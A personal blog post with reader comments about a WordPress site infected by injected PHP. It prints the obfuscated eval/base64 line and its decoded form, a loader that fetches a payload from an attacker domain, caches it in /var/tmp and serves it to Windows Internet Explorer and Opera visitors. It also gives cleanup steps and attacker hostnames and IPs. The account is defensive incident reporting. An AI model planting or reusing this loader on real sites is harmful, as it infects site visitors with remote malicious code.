More Attacks On EP Studios!

The battle is still on.  My website went offline unexpectedly this week.  Thanks to the backup guys at Vaultpress who notified me about it.  The site was giving error code 500: “Internal Server Error.”  Oops.  Checking the WordPress files, I found that nearly every php file had this as its first line (enclosed in php tags):

eval(gzinflate(base64_decode(‘dVRtb9s2EP7sAvsPF…[A large number of letters and numbers]…4w+9/’)));

Using this handy decoder, this translates into:

if (!defined(‘frmDs’)){ define(‘frmDs’ ,1); function frm_dl ($url) {
if (function_exists(‘curl_init’)) { $ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else
{$out = file_get_contents($url);} return trim($out); } function
frm_crpt($in){ $il=strlen($in);$o=”; for ($i = 0; $i < $il; $i++)
$o.=$in[$i] ^ ‘*’; return $o; }
function frm_getfrm() { $defframe =

[ I had to exclude some html code here, WordPress doesn’t like it]

$codelink = ‘http://ghenkdwmk.myfw.us/nc/gnc.php?ver=jquery.latest.js’;
id=”__mceDel”> if (!$codelink){ return $defframe; } $dr=’/var/tmp’; $f =
$dr.’/sess_’.md5(‘frm_frame’); if(!file_exists($f) || time() –
filemtime($f) > 60*5) { $dlc = frm_dl($codelink); if ($dlc){ if ($fp =
@fopen($f, ‘w’)){ fwrite($fp, frm_crpt($dlc)); fclose($fp); } else
return $dlc; } else @unlink($f); } $fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):$defframe; } $ua =
$_SERVER[‘HTTP_USER_AGENT’]; if (preg_match(‘/Windows/’, $ua) &&
preg_match(‘/MSIE|Opera/’, $ua) ){ error_reporting(0);
if(!isset($_COOKIE[‘__utmfr’]) && $nfc=frm_getfrm() ) {
@setcookie(‘__utmfr’,rand(1,1000),time()+86400*7,’/’); print($nfc); }
}}

After manually deleting this evil first line from the many infected php scripts, I thought I was making progress.  Everything cleaned up and … Bang!  The lines were back again!  I decided to look a little more closely at the php code.  Clearly there was some file that was doing all this code injection and I hadn’t deleted it.  The answer was in this code:

if (!$codelink){ return $defframe; } $dr='/var/tmp'; $f =
$dr.'/sess_'.md5('frm_frame'); if(!file_exists($f) || time() -

The code downloads a file and places it in the /var/tmp directory.  The file name starts with ‘sess_’ followed by a meaningless number.  Looking in /var/tmp, lo and behold, it was there, a binary file that clearly was the evildoer.  I deleted it and waited.  After a few minutes it was back, reconstituted by the scripts in the WordPress php files.  I deleted it again, used chmod to set the permissions of /var/tmp to 444 (read-only by everyone, even the owner – ha!), and went about deleting all the first lines of each infected file again.  Turns out the website still didn’t work.  Examining the error logs showed that the stupid virus or trojan or whatever you’d call it had corrupted one of the php files.  I downloaded the WordPress package, copied the good file over the bad file and, — ta-da! — website is up and running (so far).  Now to the perps.  In the code above is the website of the bad guys: ghenkdwmk.myfw.us.  Whatever that’s supposed to mean. Pinging them (I wouldn’t advise visiting their site) gave a response, and an IP address of 151.248.123.170.  Traceroute led right to a bunch of servers in Russia (http://ovzhost60.vps.reg.ru/) .  A web ip tracer gave this map.

Screenshot from 2013-04-01 18:20:54
Where the bad guys are.
Screenshot from 2013-04-01 19:07:09
Must be a boring place to live.

Satellite imagery confirms that yes, this is the middle of nowhere (Siberia maybe?).  So, I guess they’ve got nothing better to do in this part of Russia than mess up other people’s  websites .  Losers.  I’ve got my eye on you…

By mannd

I am a retired cardiac electrophysiologist who has worked both in private practice in Louisville, Kentucky and as a Professor of Medicine at the University of Colorado in Denver. I am interested not only in medicine, but also in computer programming, music, science fiction, fantasy, 30s pulp literature, and a whole lot more.

12 comments

  1. I’m hacked with this… Does this only affect wordpress php files? As only those seem to be affected. Please confirm

  2. Thanx for the quick response.

    So, I spent few hours cleaning these files. I was able to find a fix form here – http://theandystratton.com/2010/shared-godaddy-hosting-wordpress-malware-hack-fix

    The script allows you to find all the infected files, I had more than 300+ files which I have now cleaned. This also affected php files which were outside the wordpress installation. The files which are targeted with name “index, page, config, core, header, footer”

    I wanted to ask if you were able to identify this as a script or server venerability?

  3. @NN I am using the plugin Better WP Security, but wasn’t at the time of the attack. I believe the initial attack was from an earlier version of WordPress security hole, but I don’t know for sure. I also had lots of affected files, but they kept reappearing after cleaning. Since I found the two backdoors (the binary starting with sess__ in /var/tmp, and the fetpd.php file in wp-admin/users) I have not had any more problems. All the files affected were owned by www-data, which is the generic low-permission apache2 user, so I don’t think the attacker had root access. Having said that, on a prior attack my server was infected by the SUCKIT rootkit, but I totally wiped my disk and reinstalled Ubuntu Server after that. I don’t think that was related to recent attack. I would advise you to keep checking for infected files, just in case there is a still a backdoor left open.

  4. Hi,

    Thanx for the update.

    I deleted all wordpress files and uploaded the latest version, since then I have not seen any infected files. I believe this was from something in a plugin I used or as you said, a wordpress hole.

    Thanx!

  5. In the same code of my site is the website of the bad guys: zqyyiogdmox.findhere.org. Whatever that’s supposed to mean. Pinging them (I wouldn’t advise visiting their site) gave a response, and an IP address of 67.208.74.71. Traceroute led right to a bunch of servers in USA. A web ip tracer gave this map: http://bestpics.ru/viewpic/67.208.74.71.jpg
    Satellite imagery confirms that yes, this is the middle of nowhere (near to Washington maybe?): http://bestpics.ru/full/67.208.74.71_sat.jpg So, I guess they’ve got nothing better to do in this part of USA than mess up other people’s websites . Losers. I’ve got my eye on you…

  6. Hi,

    did you ever examined, which script in special did it? I mean, WHAT Script/file was exactly doing the injection in the PHP Files?

    1. As I recall there were a number of backdoors but I don’t know what the exact initial point of attack was that got them there. It was an older version of WordPress and (hopefully) may not be relevant now. After I wrote the post I did find some additional malignant code in the WordPress phpmyadmin plugin which I deleted. This plugin apparently is notorious for vulnerabilities and maybe was the initial attack site, or maybe it was an unrelated attack. The bad code was javascript in this module. I removed the whole plugin and I recommend doing the same thing if you are using it.

      1. Yeah, i have the idea that a timthumb function in a WP-Theme did it. My problem is… having some dozen of WP-Installs on a Server and i’m trying for days to find the source of this hack. Since the timthumb idea is only a assumption. Thanks for your reaction.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.